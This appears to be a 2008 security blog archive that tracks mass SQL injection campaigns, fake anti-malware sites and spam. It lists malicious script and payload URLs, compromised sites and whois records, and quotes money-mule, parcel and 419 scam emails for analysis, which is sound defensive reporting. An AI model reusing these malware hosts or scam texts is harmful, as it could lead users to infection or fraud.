Sponsored by..

Monday, 9 June 2008

SQL Injection: sslnet72.com, encode72.com, bannerupd.com, err68.com, cookieadw.com

Another batch of domains showing up in SQL injected are sslnet72.com, encode72.com, bannerupd.com, err68.com, cookieadw.com.

Some notable compromised sites:

  • ise.ie - Irish Stock Exchange
  • pittsfield-ma.org - City of Pittsfield
  • corangamite.vic.gov.au - Corangamite Shire, Victoria
  • fdc.org.br - Brazilian government agency
  • dailyu.com - Local newspaper
  • www.humanrightsfirst.org - Campaigning organisation
  • therecruitbusiness.com - Recruiting
  • corporate-responsibility.org - Business information
  • childcarefinancialaid.org - Financial information
  • micronet.com - Computer storage
  • tairawhiti.ac.nz - Tairawhiti Polytechnic, New Zealand
The payload at the moment is undertermined, and some of these sites will have been cleaned up. At the time of writing, Irish Stock Exchange at ise.ie is still compromised.

"Company Littmann Stethoscopes Co.Ltd" bogus job, spoofing medisave.net

medisave.net is an "under construction" website belonging to the wholly legitimate Medisave UK Ltd, a supplier of medical equipment.

Unfortunately, there is a fake job offer being sent out in Medisave's name. One twist is that the "From:" address is jobs@medisave.net, but the reply to address is littmannstethoscopeshelpdesk@gmail.com. The spammers are taking advantage of the fake the the "reply to" address is often not clear until the user clicks "reply", otherwise they tend to see the fake "from" address (note, medisave.net is not compromised and is not sending out these emails).

The job offer is likely to be some sort of money mule/money laundering scam. Really there's no need to dig further. Of interest is the fact the the email address has been harvested from a UK retailer and this is a UK-targeted spam.

From: Company Littmann Stethoscopes Co.Ltd
Reply-To: littmannstethoscopeshelpdesk@gmail.com
Subject: Online Job Opportunity (Apply Now )

Would you like to earn £5,000 in a week?

Reply Back for more details

100% legal No upfront payment from you.

Risk Free

Amazon.com - reverse pump and dump or blackmail?

I received this unintelligible email from an IP address in Russia (213.221.29.19), probably relating to the recent mystery outage at Amazon.com.

Subject: Amazon.com In what a problem?
Date: Mon, June 9, 2008 7:14 am

Hello!
News agency Reuters informs about not to working capacity of a site amazon.com in
current of two weeks since June, 9th and corresponding it to falling of share price. Be close
at work with them.
What gives? My best guess is that someone is trying to either drive the share price down (perhaps they have a put option), or perhaps it is part of some blackmail plot relating to the amazon.com outage.

Unfortunately for the bad guys, the email is completely incomprehensible. As spam, this one is definitely destined for the failboat.

Thursday, 5 June 2008

Googling for SQL injection infected sites

A very rough and ready Google search shows (warning: results may lead to malware) 792,000 pages that were infected when Google visited the site. Sites that say "This site may harm your computer." can be considered as persistent offenders. Note also that the search results may have some false positives.

All very interesting, you might think. But if you work in an IT department, it can be very useful to find sites that your users might visit so that you can take action.. or perhaps you can even check your own business.

In this current round of attacks, the bad javascript file is called b.js, so you can find a lot of infected sites by Googling for "script src" b.js (you need to include the quotes). That gives hundreds of thousands of matches.

One obvious check is to add your company name, for example "script src" b.js "oceanic airlines", but Google is cleverer than that. If you use the "inurl" function, then you can search for sites in certain TLDs or with certain names. For example "script src" b.js inurl:gov lists several government sites, "script src" b.js inurl:oceanic would find results on sites such as oceanic-air.com, oceanicair.net, oceanic-air.co.uk.

You can narrow down results by country by using the Advanced Search (or you could just use the "national" Google site such as google.co.uk, google.ca etc). You can use other search engines too, but really Google has the most powerful searching options.

Of course, if you want to confirm if the site is still infected, then you will need to visit it. If you don't want all the hassle of firing up a Linux box, then one safe tool is SamSpade for Windows which allows you to look at the underlying HTML safely. It's a pretty old tool, and not perfect, but very useful for a number of tasks. Alternatively, WGET for Windows is more powerful and it allows you to download files in a command line (although care needs to be taken once they are on your machine). I tend to use both.

More SQL injection fun: view89.com, exe94.com and tag58.com

Yet more new domains in this never ending wave of SQL Injection attacks: view89.com, exe94.com and tag58.com. Infected sites load a malicious javascript from www.view89.com/b.js or www.tag58.com/b.js which redirects through exe94.com/cgi-bin/index.cgi?ad - that in turn might try any number of things to infect the visitor's PC.

Chinese "selling-domain" mails

Probably not a scam, and really only a moderate hit on the Spam-O-Meter, but there do seem to be a number of emails from a person called Liu offering to sell a .cn version of your .com domain.

Subject: selling-domain: ------.cn
From: ljp013@vip.163.com
Date: Thu, June 5, 2008 1:13 am


Hello
We have ------.cn and think it is useful for you to made a China Website and
to explore China market.

We are pleased to inform you that we are now engage an activity by which you
can purchase this domain only with $1000 USD. If you are interested in it
,please reply to us and discuss the domain tranfer matters.
We could finish the transaction through www.sedo.com which is a international
Domain trade agency.Then,sedo.com will help you transferred the domain.
China is the biggest market in the world £¡Dot.cn domains is a symbol of
enterprises in China£¡10,000,000 .cn domains are been registered£¡

At last,Sorry for the disturb if any.

Wish you a happy new year 2008, and welcome to our China to visit Olympic Games.

Best Regards.

Liu


=================

Appendix:
Some large international companies use .cn domain in China.
http://www.google.cn/ The world's largest search company google.com China Station
http://www.Amazon.cn The world's largest online bookstore amazon.com company
China Station
http://www.Yahoo.cn Yahoo.com he is the sub-stations in China

It used to be the case that anyone wanting to register a .CN name had to either live in China or have a business that operated in China, although this is no longer the case and it seems everyone can register a .CN name (some restrictions apply on names and content). Neulevel's FAQs on the .CN TLD are enlightening. There is a dispute policy if you feel that your domain name has been registered unfairly.

To be honest, I'm not at all bothered about .CN names and I certainly won't be shelling out $1000 for something I won't use. But as ever, if you want to protect your brand abroad then perhaps securing the .cn version of your domain might be a good idea, there's a list of registrars at CNNIC.

flyzhu.9966.org and exec51.com SQL injection attacks

More in the ever morphing world of SQL injection attacks. Sites that were hit with the xiaobaishan.net attack are now directing to flyzhu.9966.org/us/Help.asp and sites previously infected with en-us18.com are now pointing to www.exec51.com/b.js

9966.org appears to be a dynamic DNS service, exec51.com is a fast flux botnet. My best guess is that there are two rival groups performing SQL injections, one of them is Chinese and the other Russian.

The nature of the botnet means that the payload delivery is a bit erratic, but with a bit of effort exec51.com coughs up a reference to fake anti-spyware site advancedxpdefender.com. That tries to install a trojan which is pretty well detected by most AV products.

Thanks also to Amir who pointed us in the direction of his guide to preventing SQL injection attacks - if your server has been hit by one of these exploits, then it might be useful to you.

Wednesday, 4 June 2008

Redmondmag.com and related sites serving up malware

One notable name that keeps coming up with regards to the latest round of SQL Injection attacks is Redmondmag.com, published by 1105 Media, Inc as well as a number of sister sites. For a publication for IT professionals to be so badly impacted by SQL injection attacks raise some eyebrows.

A quick bit of Google searching shows how bad it is: a search for sysid72.com "1105 media" shows 35 infected pages belonging to virtualizationreview.com, visualstudiomagazine.com, redmondmag.com, reddevnews.com and certcities.com. Searching for xiaobaishan.net "1105 media" comes up with 121 matches for tcpmag.com and certcities.com. There are similar hits when searching for en-us18.com and locale48.com.

An alternative search you can do is b.js "1105 media" where this current batch of injected javascripts can clearly be seen (of course, this blog entry will also turn up for the same search string in time!)

This problem goes back to at least April when redmondmag.com was infected by the nihaorr1.com attack.

Here's the thing: the sites showing up in Google are not infected at the moment, but they were when Google crawled them. Clearly 1105 Media cleans up the attacks quickly, but it has not yet managed to secure its SQL server against injection attacks. Perhaps 1105 Media should read some of their own articles on the subject (see redmondmag.com/news/article.asp?editorialsid=9928 - visit at your own risk!)

win496.com, tag58.com, rundll841.com and sslput4.com: another SQL injection attack

Yet another SQL injection attack doing the rounds, this time inserting references to www.win496.com/b.js, www.tag58.com/b.js and www.rundll841.com/b.js. The javascript redirects to sslput4.com/cgi-bin/index.cgi?ad. (Obviously, don't visit these sites unless you know what you are doing!)

All the domains run on a distributed botnet and were freshly registered this morning to a no-doubt fake address:

whois -h whois.crsnic.net win496.com ...
Redirecting to DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM

whois -h whois.PublicDomainRegistry.com win496.com ...
Registration Service Provided By: VIVIDS MEDIA GMBH
Contact: +49.3094413291

Domain Name: WIN496.COM

Registrant:
n/a
lera (casta4000@mail.ru)
reklama uslug 727 94-00
Seul
3566,123456
RU
Tel. +7.4952345672

Creation Date: 04-Jun-2008
Expiration Date: 04-Jun-2009

Domain servers in listed order:
ns4.win496.com
ns3.win496.com
ns2.win496.com
ns1.win496.com


Administrative Contact:
n/a
lera (casta4000@mail.ru)
reklama uslug 727 94-00
Seul
3566,123456
RU
Tel. +7.4952345672

Technical Contact:
n/a
lera (casta4000@mail.ru)
reklama uslug 727 94-00
Seul
3566,123456
RU
Tel. +7.4952345672

Billing Contact:
n/a
lera (casta4000@mail.ru)
reklama uslug 727 94-00
Seul
3566,123456
RU
Tel. +7.4952345672

Status:ACTIVE
There are probably several different payloads, one we have seen is the Danmec trojan which drops a file called aspimgr.exe into the SYSTEM32 folder (more details here, here and here). The payload delivery may be randomised, it seems to be quite difficult to determine exactly what is going on.

If your server has been infected, then you need to do more than just clean it up.. you need to sanitize your SQL inputs. You can read more details of how SQL injections works here.

Right now it is difficult to say how many sites are impacted as the domains are really very new.

Added: you can add sysid72.com/b.js to this list too. That was registered 5 days ago, and a Google search already shows over 2000 hits. Also locale48.com has infected over 4000 pages in the same time frame.

Tuesday, 3 June 2008

Some people are stupid

A classic post over at the F-Secure blog where some muppet "hacker" accidentally emailed out their malware generation tool and put it right into the hands of anti-virus researchers. To quote F-Secure, Hey, thanks. Keep up the good work.

On a more serious note, this tool is used to generate trojanised PDF files. So go and check that your version of Adobe Reader is up to date right now before doing anything else..

en-us18.com, libid53.com and rundll92.com SQL injection attack

Another bunch of at least three domains (perhaps more) being used in SQL injection attacks are en-us18.com, libid53.com and rundll92.com. In each case the injected script points to b.js, and this then tries to redirect visitors to libid53.com/cgi-bin/index.cgi?ad

It looks like some sort of fast flux network based on a botnet, so it's not actually very reliable and as yet it hasn't delivered a payload in our lab. The ISC indicate that the attack serves up a couple of infected Flash banners, although in this case the redirector seems to be en-us18.com/cgi-bin/index.cgi?ad

At the moment, these merely serves up another redirector to MSN.com, but it would be easy enough for the botnet controllers to change it to a malicious payload.

Some notable infected sites:

  • tcpmag.com (Technology magazine - again!)
  • annefrank.org (Anne Frank Museum)
  • galatta.com (Indian movies)
  • onefootball.dk (Sport)
  • tvoneonline.com (US TV station)
  • belfastcity.gov.uk (UK local government)
  • marketingprinciples.com (Marketing guide)
  • hobsonsbay.vic.gov.au (Australia local government)
This is quite a fresh looking exploit, this is not comprehensive. It is very disappointing to see tcpmap.com listed yet again, and we've seen sister publication redmondmag.com infected before too.

xiaobaishan.net - yet another SQL injection attack

It looks like the sites hit by the chliyi.com attack have been hit again, this time with an injection to a script pointing at www.xiaobaishan.net/dt/us/Help.asp. Right at the moment, the www.xiaobaishan.net domain is not resolving, but it does appear to be hosted on 219.146.128.119 in China.

It looks like the domain may well be a legitimate one that has somehow been compromised and 219.146.128.119 looks like a pretty standard shared server.

It's possible that the chliyi.com infected sites were deliberately targeted, the resulting HTML is an awful mess though (see below).

Some notable infected sites:

  • kcsg.com (again)
  • sciencescotland.org (again)
  • paramountcomedy.com (again)
  • drdrew.com (again)
  • gisp.org (again)
  • legis.state.ia.us (Iowa State legislature)
  • modernamuseet.se (Stockholm Museum)
  • calbears.berkeley.edu (University)
  • reportchildsex.com (Child protection)
  • cas.org.uk (Citizen's Advice Scotland)
  • tcpmap.com (Technlogy magazine)
  • randomhouse.com.au (Random House publishers, Australia)
  • ispyni.com (Northern Ireland tourism)
There are a number of other sites, notably in Ireland, Australia and Canada hit too.

This is not the only SQL injection attack doing the rounds today, and I suspect that some of them have been hit by another one pointing at en-us18.com/b.js

As an aside, these multiple SQL injections are really messy. A code snippet from sciencescotland.org demonstrates this:





Monday, 2 June 2008

Bizarre USPS scam


It's hard to tell what the scammer is trying here due to the amusingly bad English. Mail originates from the spammers favourite email service, Gmail (72.14.214.225) but uses a French Yahoo! email address as a drop box with a Polish "From" address.

Clearly some sort of parcel scam where there will be a release fee of some description. Steer clear.

Subject: Please Contact Us With This Email Address Below (usps6864@yahoo.fr)
From: "markwillams2 Gazeta.pl"


Hello Dear,


Please i have to let you knowing this that your have reciverd your parcel,
and do not let me knowing about that since last year.



At this very point now, do to i have not heard from you to knowing the
sitution of things now, for your information track your parcel and you will
sean what am talking about please.

However if you knowing that you are not the one please do get back to me as
matter of urgent to day.please track and sean with this information Below

http://www.usps.com/shipping/trackandconfirmfaqs.htm

Label Number: 0515 0134 7110 8886 8806

Please Contact Us With This Email Address Below (usps6864@yahoo.fr)

Thanks
Mark Williams

Tuesday, 27 May 2008

pest-patrol.com is not the real PestPatrol - part II

The fake pest-patrol.com site we mentioned a few days ago has fixed its download problem and has given us a sample. Like many of these fake anti-malware sites, the executable morphs continually to avoid protection.

Detection rates are not good (VirusTotal results), and the real PestPatrol / eTrust product doesn't pick it up yet.

I strongly suspect that there's nothing good in the 85.255.112.0 - 85.255.127.255 range at all, and it is probably a good idea to block access to that entire IP block.

Antivirus;Version;Last Update;Result
AhnLab-V3;2008.5.22.1;2008.05.27;-
AntiVir;7.8.0.19;2008.05.27;SPR/Dldr.PestPatr.A
Authentium;5.1.0.4;2008.05.26;-
Avast;4.8.1195.0;2008.05.27;-
AVG;7.5.0.516;2008.05.26;-
BitDefender;7.2;2008.05.27;-
CAT-QuickHeal;9.50;2008.05.26;-
ClamAV;0.92.1;2008.05.27;-
DrWeb;4.44.0.09170;2008.05.27;-
eSafe;7.0.15.0;2008.05.26;-
eTrust-Vet;31.4.5826;2008.05.27;-
Ewido;4.0;2008.05.26;-
F-Prot;4.4.4.56;2008.05.26;-
F-Secure;6.70.13260.0;2008.05.27;-
Fortinet;3.14.0.0;2008.05.27;-
GData;2.0.7306.1023;2008.05.27;-
Ikarus;T3.1.1.26.0;2008.05.27;-
Kaspersky;7.0.0.125;2008.05.27;not-a-virus:Downloader.Win32.FraudLoad.bz
McAfee;5303;2008.05.26;-
Microsoft;1.3520;2008.05.27;-
NOD32v2;3134;2008.05.27;-
Norman;5.80.02;2008.05.26;-
Panda;9.0.0.4;2008.05.27;-
Prevx1;V2;2008.05.27;-
Rising;20.46.12.00;2008.05.27;-
Sophos;4.29.0;2008.05.27;-
Sunbelt;3.0.1123.1;2008.05.17;-
Symantec;10;2008.05.27;-
TheHacker;6.2.92.320;2008.05.26;-
VBA32;3.12.6.6;2008.05.27;-
VirusBuster;4.3.26:9;2008.05.26;-
Webwasher-Gateway;6.6.2;2008.05.27;Riskware.Dldr.PestPatr.A

chliyi.com - another injection attack

Thanks to Dancho Danchev for the heads up, it looks like there's another SQL injection attack on the loose, this time pointing to chliyi.com/reg.js, with about 10,000 hits currently on Google for a variety of sites.

Reportedly, this launches some sort of ActiveX attack via obfuscated VBscript. This is another good reason not to use Internet Explorer, as most other browsers do not support ActiveX and are not vulnerable.

Unlike some other recent injection attacks, this one seems to use a legitimate domain called chliyi.com - unfortunately for the bad guys, the registration on the domain is going to run out pretty soon.

Domain Name.......... chliyi.com
Creation Date........ 2003-06-12 11:21:39
Registration Date.... 2003-06-12 11:21:39
Expiry Date.......... 2008-06-12 11:21:39
Organisation Name.... junrong shen
Organisation Address. dongxiaoqiao3-1-104
Organisation Address.
Organisation Address. suzhou
Organisation Address. 215006
Organisation Address. JS
Organisation Address. CN

Admin Name........... shen junrong
Admin Address........ dongxiaoqiao3-1-104
Admin Address........
Admin Address........ suzhou
Admin Address........ 215006
Admin Address........ JS
Admin Address........ CN
Admin Email.......... wzh@hisuzhou.com
Admin Phone.......... +86.51265678898
Admin Fax............ +86.51257306265

Tech Name............ zhihui wang
Tech Address......... suzhou
Tech Address.........
Tech Address......... suzhou
Tech Address......... 215021
Tech Address......... JS
Tech Address......... CN
Tech Email........... wzh@hisuzhou.com
Tech Phone........... +86.5169697639
Tech Fax............. +86.5167621807

Bill Name............ zhihui wang
Bill Address......... suzhou
Bill Address.........
Bill Address......... suzhou
Bill Address......... 215021
Bill Address......... JS
Bill Address......... CN
Bill Email........... wzh@hisuzhou.com
Bill Phone........... +86.5169697639
Bill Fax............. +86.5167621807
Name Server.......... dns22.hichina.com
Name Server.......... dns21.hichina.com
The IP address of the server is 218.30.96.87 which is not in the Spamhaus DROP list which indicates again that the chliyi.com might well be legitimate, just compromised.

This is another attack that goes to show that "there is no such thing as a safe site". A scan of the Google results comes up with some interesting (and alarming) infected sites:

  • forces.ca - Canadian military
  • paramountcomedy.com - Paramount Comedy (Cable TV channel)
  • kcsg.com - KCSG (Utah TV station)
  • umnh.utah.edu - University of Utah
  • digital.lib.ecu.edu - East Carolinia Unitersity
  • chapel.duke.edu - Duke University
  • drdrew.com - Dr Drew (relationship advice)
  • gisp.org - Global Invasive Species Program
  • sciencescotland.org - Royal Society of Scotland
  • moffitt.org - H. Lee Moffitt Cancer Center and Research Institute
  • confetti.co.uk - Confetti (Wedding planning)
  • buildabear.com - Build-a-Bear Workshop
  • delluniversity.com - Dell
  • trelleborg.com - Trelleborg AB (Polymer manufacturer)
None of these are huge sites when it comes to traffic, but there are some well-known names there and certainly some which you would hope would be more secure. Out of the other infected sites, it seems that the US Canada, Australia, the UK and Ireland seem to have the biggest cluster of infected sites with very few showing outside those countries.

This is not a comprehensive list of infected sites, and many of these sites will have been cleaned up.

If you are running an SQL server, then the rule is to secure your inputs, else you will get attacked again and again.

Wednesday, 21 May 2008

pest-patrol.com is not the real PestPatrol

Thanks to Dancho Danchev for pointing out pest-patrol.com, yet another dodgy looking scareware site. Of course, the real PestPatrol is a pretty well known and legitimate anti-spyware product from CA, the one with the hyphen in the middle is definitely trying to pass itself off as the real thing. (Click the thumbnail for a larger picture).



The fake pest-patrol.com is hosted on 85.255.121.181 in the Ukraine, a range of network addresses that features on the Spamhaus DROP list, and has domain registration service from Estdomains which always seems to be a popular choice with dodgy web sites.

The bottom of the page has a copyright notice claiming that it was created by "Pest Patrol, Inc.", but that is likely to be fake. A large amount of text has been copied and pasted directly from the real CA site. The "PestPatrol" name is pretty widely registered as a trademark, so apart from anything else, this fake pest-patrol.com site is clearly violating CA's trademark rights.

What's interesting about this is just how the pest-patrol.com domain ended up in the hands of a bunch of guys in Eastern Europe. Although the "PestPatrol" name is trademarked, that only applies to computer software. As is turns out, the original pest-patrol.com controlled pests of the creepy crawly variety. CA (or SaferSite Inc as it was before CA took over) would have had no claim over the domain name as it wasn't violating any trademark or causing confusion. But eventually the name expired and after being dropped a couple of times it ended up with someone who clearly is using it to violate a trademark.

The lesson for businesses is perhaps that they need to keep an eye on domains that could potentially violate a trademark or be confusing and secure them if they expire, several registrars can back order domain names. In the long run, that's probably easier than trying to track down an anonymous registrant from the former Soviet Union.

The download option on pest-patrol.com doesn't work at present, but it could be similar to this one (VirusTotal scan results) which appears on a sister site. Unfortunately, CA's genuine product doesn't seem to detect it..

Sunday, 11 May 2008

Mass phpBB attack free.hostpinoy.info and xprmn4u.info

Another injection attack reported by the ISC, and this time it appears to be using one of many potential flaws in phpBB. Injected code points to free.hostpinoy.info/f.js and xprmn4u.info/f.js, and a Google search of these two terms currently comes up with 858,000 matches between them indicating that this is a very large scale attack.

phpBB is a great bit of software, but sadly it is riddled with security holes and requires constant updating. If you're running a phpBB forum then you need to patch it as a matter or urgency. If you don't run phpBB and are looking at running a forum then I've got to say.. try something else.

It looks like some version of the Zlob trojan is being served up, see here and here for more details. (Thanks sowhatx). Detection rates seem to be patchy. It's possible that the injected code is using some sort of geotargetting as the destination sites are not consistent.

free.hostpinoy.info is 209.51.196.254 (XLHost.com)
xprmn4u.info is 217.199.217.9 (Mastak.ru)

Updated: A brief analysis of some of the impacted sites shows a mix of high traffic forums and long-dead ones. Some of these forums are hit with multiple exploits and massive amounts of spam, which indicates that they are running a very out of date version of phpBB.. so folks, if you have a forum which you don't use any more, do everyone a favour and delete it.

Wednesday, 7 May 2008

winzipices.cn and bbs.jueduizuan.com - another SQL injection attack

The ISC has warned about another SQL Injection attack, following on from this one a few weeks ago. This time the injection is inserting a script pointing to the winzipices.cn and bbs.jueduizuan.com domains.

The malicious script is pointing to winzipices.cn/1.js, winzipices.cn/2.js, winzipices.cn/3.js, winzipices.cn/4.js and winzipices.cn/5.js and also bbs.jueduizuan.com/ip.js. As ever, don't visit these sites unless you know what you are doing.

Right at the moment, winzipices.cn is coming up with a server error, but bbs.jueduizuan.com is functioning just fine. This tries to attack visiting systems using the MS07-004 vulnerability, a RealPlayer vulnerability plus it attempts to download an executable from www.bluell.cn/ri.exe possibly using a shell vulnerability (VirusTotal analysis here, mostly detected as Trojan.Win32.Agent.lpv, Trojan.MulDrop.origin or TR/Dropper.Gen).

Some IP addresses:
www.bluell.cn is 60.191.239.219
winzipices.cn is 60.191.239.229
bbs.jueduizuan.com is 60.191.239.219

My recommendation is to block access to the entire 60.191.239.x range if you can.

The the moment, a Google search for winzipices.cn shows 1790 matches, for jueduizuan.com it is 1640 matches. Expect those figures to climb sharply.

If you are running an impacted SQL server, then you need to secure it and perform better validation, else the problem will happen again. Client machines should be protected if they are fully up-to-date on patches, if you have been infected then use the excellent Secunia Software Inspector to check your system for vulnerable apps.

As always, there are some high profile sites that have been compromised. They may well have been cleaned up by now, so inclusion here does not mean that they are unsafe or safe to visit.

bbs.jueduizuan.com
  • safecanada.ca (Canadian Homeland Security again).
  • breastcanceradvice.com, arthritisissues.com, menssexhealth.com, www.bipolardepressioninfo.com (Health)
  • dubaicityguide.com (Travel)
  • classicdriver.com (Motoring)
winzipices.cn
  • imo.org (International Maritime Organisation)
  • cifas.org.uk (Fraud Prevention)
  • hmdb.org (Historical Marker Database)
  • abbyy.com (OCR software)
  • cancerissues.com, adhdissues.com, depressionissues.com, diabeticdiets.org, erectilefacts.com, prostatecancerissues.com, digestivefacts.com (Health)
  • www.asiamedia.ucla.edu, www.international.ucla.edu, www.asiaarts.ucla.edu, www.isop.ucla.edu (UCLA)
  • newmarket.travel (Travel)
  • discoverireland.ie (Travel)
  • gay.tv (Lifestyle)
Some of these sites are regularly infected with SQL injection attacks, and safecanada.ca was infected with the last major outbreak. The problem is that once a site has been attacked and enumerated, then it will be attacked again and again until it is fixed.

As mentioned before, there is no such thing as a safe site.

Wednesday, 23 April 2008

nihaorr1.com - there's no such thing as a "safe" site

Websense gave a heads up about yet another mass defacement, impacting a few high profile web sites. Just to make life difficult, they didn't specify the domain in use.. but it isn't exactly rocket science to find out that it is nihaorr1.com.

I'm going to make an assumption that if you're reading this blog, you're at least somewhat technically savvy. Don't visit any of these sites unless you know what you are doing.

Googling nihaorr1.com/1.js brings up several thousand matches. Surprisingly, an eximination of www.nihaorr1.com/1.js shows that it is not obfuscated at all and points to www.nihaorr1.com/1.htm.. and that has all the exploits nicely laid out - MS07-055, MS07-033, MS07-018, MS07-004 and MS06-014. Also there are exploits for RealPlayer, Ajax, QQ Instant Messenger and some sort of Yahoo! product (probably Instant Messenger).


If your site has been compromised and you're looking for answers.. well, all I can tell you is that it will have been done through some sort of SQL Injection similar to this one.

If you're supporting client PCs that are fully patched, you have a little less to worry about unless you have RealPlayer or Yahoo! IM installed. Perhaps it is a good time to consider banning these applications in any case, particularly RealPlayer which is a very common vector for attack.

Why do I say there's no such thing as a "safe" site? Well, among the compromised sites are the following:

www.redmondmag.com [Independent publication about Microsoft]
www.pocketpcmag.com [Smartphone & Pocket PC magazine]
www.careers.civil-service.gov.uk [UK Civil Service]
www.faststream.gov.uk [UK Civil Service]
www.safecanada.ca [Canadian National Security]
www.n-somerset.gov.uk [UK Local Government]
events.un.org [United Nations]
www.unicef.org.uk [UNICEF]
www.iphe.org.uk [Institute of Plumbing and Heating Engineering]
www.umc.org [United Methodist Church]
www.umita.org [United Methodist Information Technology Association]
www.simplyislam.co.uk [Islamic Information site]
www.rsa.org.uk [Royal Society for the Encouragement of Arts]
www.24.com [Sports]
www.oddbins.co.uk [Major UK wine retailer]
www.avx.com [Electronic components]
www.advantech.com [Computer components]
www.aeroflot.aero [Airline]
www.aeroflot.ru [Airline]

In other words, you can't rely on the site you are visiting to be safe.. so the onus is on the end user to make sure their PC is fully patched and as secure as possible.

Tuesday, 22 April 2008

Win32/Loodok!generic.2 in SYSTEM.DLL - likely false positive

We're getting a plague of these with eTrust (pattern 5723):

[time 22/04/2008 12:54:21: ID 14: machine xxxxx.com: response 22/04/2008 12:54:46] The Win32/Loodok!generic.2 was detected in C:\DOCUME~1\XXXXX\LOCALS~1\TEMP...\SYSTEM.DLL. Machine: XXXXX, User: XXXXX\xxxxx. Status: File was cured; system cure performed.

The subdirectory varies, but it is usually %user profiles%\local settings\temp\ns???.tmp where the question marks indicate a random letter/number. You may find that the subdirectory has vanished by the time you investigate.

This appears to be happening with the installer for Firefox (also tested with Netscape Navigator). You can see the problem if you snooze the AV scanner and then fire up the Firefox installer and leave it running.. the SYSTEM.DLL is clearly there.

Apart from eTrust, VirusTotal gives it a clean bill of health.

You may be seeing this fire off by itself if a software package is autoupdating. I can't identify exactly which installer is in use here, but it is likely to be shared between many other applications.. so expect a storm of these.

As usual with false positives, expect a fix to be issued by CA very soon. The problem seems to be with pattern 5723, so updating to a later virus signature should probably cure it.

Added: Pattern 5724 also reports a positive, but the beta version of 5725 does not. You can download beta signatures from CA here.

Added: 5725 is now available for download as normal, this should cure the problem!

Thursday, 17 April 2008

RavMon.exe virus on new Toshiba Satellite laptop from Comet, Part II

A few weeks ago I wrote about a new laptop with a virus preloaded that was bought from Comet. As far as I knew, I was the only person to have this problem but after carefully checking everything that I had done to set up the machine, my conclusion was that the RAVMON.EXE malware was preloaded on the PC.. but perhaps it was a one-off.

Not so. From the comments on the post, it seems that Toshiba laptops from Currys and PC World have the problem, over at the Irreverence Is Justified blog, it turns out that exactly the same thing has happened. Same virus, same model of Toshiba and Comet (again).

Detections were varied, but it appears to be a trojan that possibly loads itself on via a USB key. The implication is that some part of the manufacturing process / preparation is compromised with infected USB devices.

So Toshiba's manufacturer process is compromised? Well, it appears to be.. but almost definitely an accident rather than a malicious act. Presumably there are many more L40-18Z laptops with the same problem..

Wednesday, 16 April 2008

2117966.net revisited

Last month I blogged about Trend Micro's website being compromised as well as thousands of others with an IFRAME injection to 2117966.net .

The ISC has followed up with an analysis of the tool used to compromise the sites. It uses an SQL injection attack to infect the server, but the interesting thing is that it uses Google to enumerate the vulnerable sites first, a technique called Google Hacking.

I guess there are a few things to note here - despite the ubiquitousness of SQL, it can still be tricky to set up and is best left to people who know what they are doing. Keep your patches up-to-date, and consider carefully if you want Google (or any other search engine) to be able to index your WHOLE site and adjust your robots.txt if necessary.

The ISC article also links to some good resources if you want to properly secure your database.

Thursday, 10 April 2008

ezBay.me.uk - or how NOT to start an online business

Sometimes, people make mistakes with their online marketing. Newbies can accidentally buy a "millions of email addresses CD" with a load of scraped email addresses and spam away. Sometimes they are not aware of trademark laws. But sometimes they are just plain stupid in so many ways that there is no excuse for not ripping into them.

Mistake One - Trademark Violation
In this case, the budding entrepreneur has gone for the name ezBay.me.uk - confusingly similar to a well-known auction company called eBay. Sure, there are other users of the "ezbay" name, but the closeness of the name and even the "camel case" capitalisation are asking for trouble, possibly some years down the line.. but trouble nonetheless.

Mistake Two - Choose a stupid domain name.
Not only does "ezbay.me.uk" possibly violate trademarks, but it uses the ".me.uk" namespace which is designed for personal use only. That could well lead to the name being revoked by the registrar. Worse, the name doesn't make sense in British English - "Ee Zed Bay"? In American English it's "Easy Bay" which *does* makes sense.. but not in conjunction with a .me.uk domain name.

Mistake Three - Spam
There's no excuse for sending out unsolicited bulk email to scraped email address, but ezBay.me.uk have done exactly that. That tends to lead to a very short life expectancy for the new auction site that you have just created.






EZBAY
24/7 online Auction Site

This is our new 24/7 on line auction please feel free to take a look if you like what you find please register and we will give you £20.00 sellers fee completely free there is no listing fee for items that you may want to sell so what are you waiting for sign up to day for your £20.00 and start selling at www.ezbay.me.uk feel free to take a look around at all the bargins
we have many less than 50% cheaper than the high street price so come on see
how easy it is with ezbay happy shopping

BRAND NEW AUCTION

Car DVD player starting bid 50p buy now price £139.00

MP4 player with 1.3m pixels digital camera 2.5in TFT screen starting bid 50p buy now price £32.90

12mp digital video camera with MP3/MP4 starting bid 50p buy now price £76.00

1.1 inch screen clip MP3 player starting bid 50p buy now price £8.50

12.1-inch with 4:3 display roof mount TFT-LCD monitor Starting bid 50p buy now price £62.50

MP3 player sunglasses with FM super-plastic frame and build-in 1 GB flash
memory starting bid 50p buy now price

best regards

mr a m dick
ezbay world

Mistake Four - Be offensive
Signing off an email with a name of "Mr A M Dick" is always likely to annoy people (unless that is the person's name in which case.. oh dear).

Mistake Five - Read Receipts
Not only is this spam, but it also sent out with a read receipt in a clumsy way to confirm the recipient's email address. Not only will the muppet sending out the spam be overwhelmed with receipts, but many people regard them as invasive of privacy.




The forensics..
The headers indicate that the mail comes from 75.125.202.82 which is also the IP address of www.ezbay.me.uk, so that's pretty much a smoking gun.

The domain name is registered to:

     Domain name:
ezbay.me.uk

Registrant:
Ezbay

Registrant type:
UK Individual

Registrant's address:
8 Calle Las Encines
Fuenta De Piedra
Malaga
295 30
ES

Last time I checked, Malaga wasn't in the UK. This address is connected with an Alibaba operation called Murrays Discount.

There's no evidence that this is a scam, but it is almost a textbook example of how to kill a business before it starts. It is notable that despite the spam run, the only person actually selling is "Murray" himself.

Tuesday, 8 April 2008

419 Scams and Social Engineering

One key element that scammers use when carrying out their business is social engineering. Usually, the approach is to make the victim believe that they are getting something for nothing.. it's even better when they can persuade the victim that the VICTIM is actually scamming someone else.

Take this recent example:




Subject: COMPENSATION,
From: eze_john1@aol.in
Date: Tue, April 8, 2008 9:15 am

My Dear Friend,
This is to thank you for your effort.I understood that your hands were tied.But Not
to worry.

I have succeeded,the money has been transfered into the account provided by a newly
found friend of mine in Australia. To compensate for your past assistance and
commitments,i have droped an International Certifie Bank Draft cheque worth of
$1,200,000,00 for you.
?
I am in London with my family presently.I do intend to establish some business
concerns here,and possibly buy some properties.Contact my Secretary in
benin-Republic? job_mike20@yahoo.fron his email below ( job_mike20@yahoo.fr) Forward
my mail to him,then ask him to send the cheque to you.Take good care of your self.
?
Best Regards,
EZE JOHN



